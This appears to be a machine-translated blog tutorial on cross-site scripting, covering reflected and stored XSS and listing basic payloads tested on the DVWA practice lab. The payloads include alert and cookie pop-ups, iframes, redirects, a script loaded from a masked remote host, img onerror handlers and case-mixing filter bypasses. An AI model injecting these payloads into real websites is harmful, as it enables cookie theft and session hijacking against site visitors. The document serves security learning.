XSS Introduction
XSS (cross site script) in order to avoid confusion with the CSS style, so short xss.
xss is a web application often appear in computer security vulnerabilities, but also the most mainstream web attacks.
xss means exploited by malicious people to submit data on the site is not user escaping or filtering the shortcoming, and then add some code embedded in web pages to go. The other user access will execute the appropriate embedded code to steal user information with user identity some action, or for visitors to viruses an attack.
xss attacks hazards include:
1. steal all kinds of user accounts, such as the machine login account, users online banking accounts, various types of administrator account
2. Control corporate data, including reading, tampering, add. Ability to delete sensitive data.
3. Illegal transfers, website linked to horse, forced to send email, control the victim machine to
attack other sites.
xss main categories
Reflective XSS (Reflected XSS), also known as non-persistent cross-site scripting attacks, it is the most common type of xss, causes of vulnerability results attacker to inject data is reflected in the response. A typical non-persistent xss contains a link with a xss attack vectors (ie each attack requires the user to click).
Storage type XSS (Stored XSS), also known as persistent type cross-site scripting attack, which generally occurs in XSS attack vector (generally refers to XSS attack code) in the site database, when a page is opened when the user executes the stored. Every time the user opens the browser, script execution. Lasting type compared to non-persistent XSS type of XSS attack more dangerous, because every time the user opens the page, view the contents of the script will be executed automatically.
XSS script structure
1. Common HTML tags
2. The method commonly used JavaScript
3. structure XSS script
popups warning
the script realized bomb box prompts, as general vulnerability testing or demonstration use, similar to the SQL injection vulnerability tests in single quotes, this script can be executed once, too it means that the back-end servers do not filter special characters <> /so that you can prove that there is a page location XSS vulnerabilities. I will write it down and show the code to run on DVWA the results under.
<script>alert('xss')</script>
<script>alert(document.cookie)</script>
The first bomb had a successful operation results window that says xss
second run results can be displayed cookie to the
page nesting
<iframe src=https://zxcv0221.github.io width=300 height=300></iframe>
<iframe src=https://zxcv0221.github.io width=0 height=0 border=0></iframe>
The first run result, I let it jump to my GitHub blog go.
The second of it, emmmmmm, I set a nested page size is 0, so nothing changes.
Page redirects
<script>window.location="https://zxcv0221.github.io"</script>
<script>location.href="https://zxcv0221.github.io"</script>
The first result is of course still run my blog home page, hey. 
First and second run the same result.
Pop warning and redirection
<script>alert("欢迎来到我的博客网站");location.href="https://zxcv0221.github.io"</script>
This can play a window and load it into my blog page.
Here I would again point to determine my blog jump.
Access malicious code
<script src="http://*********/xss.js"></script>
Do not look, I do not have this stuff, but also to see. . . . . . . . . . . . . . . . . . . . . . . . . 
Using image tag
<img src="#" onerror=alert('xss')>/*与上面的<script>标签相比有什么优点可以体会一下。嘿嘿*/
<img src="javascript:alert('xss');">/*也可以弹窗*/
<img src="http://**********.***"></img>/*可以放你想引导到什么网站,可以得到用户cookie,至于放什么照片,照片参数都可以自己设定。*/
Bypassing the filter script
case:<ScrIpT>alert('xss')</ScRipt>
character encoding, using the URL, base64 encoding, etc.
<a href="javascript:alert("xss")">小弹窗</a>
The second run results: a hyperlink
that above all reflective of xss.
Xss more dangerous type of storage, the risk is much greater than the extent of the reflection type xss.
OK, stop here.
I slipped ..................
